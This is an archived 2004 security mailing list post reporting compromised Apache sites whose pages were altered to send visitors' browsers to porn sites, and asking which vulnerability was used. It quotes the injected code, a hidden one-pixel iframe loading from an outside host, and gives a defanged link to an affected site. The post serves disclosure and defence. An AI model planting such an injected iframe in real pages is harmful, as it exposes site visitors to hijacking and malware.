Full Disclosure mailing list archives
browser hijack by apache sites
From: Filbert <filbert () pandora be>
Date: Sun, 23 May 2004 15:19:30 +0200
Hi, This is the second time this weekend that I've been warned of an apache site on a Linux server were a line of code was added to redirect browsers to porn sites. First was the site of a Belgian political party. Second came today, and as of writing this it's still there. The admin was informed so it can be gone soon. hxxp://www.previsit.com/carrefour/nl/ <- hxxp must changed to http IE users do NOT click. the code added at the bottom is: <iframe SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1 HEIGHT=1></iframe></body> anyone seen this before? What vulnerability is exploited here? FP? Thx, Filb. -- echo "+++ATH0filb@+++ATH0filb () linuxmail org" | sed 's/+++ATH0//g' _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- browser hijack by apache sites Filbert (May 23)
- <Possible follow-ups>
- Re: browser hijack by apache sites D B (May 23)
- Re:browser hijack by apache sites Ian Latter (May 23)
- browser hijack by apache sites Feher Tamas (May 24)
- Re: browser hijack by apache sites Filbert (May 24)
- Re: browser hijack by apache sites Matthijs Dalhuijsen (May 25)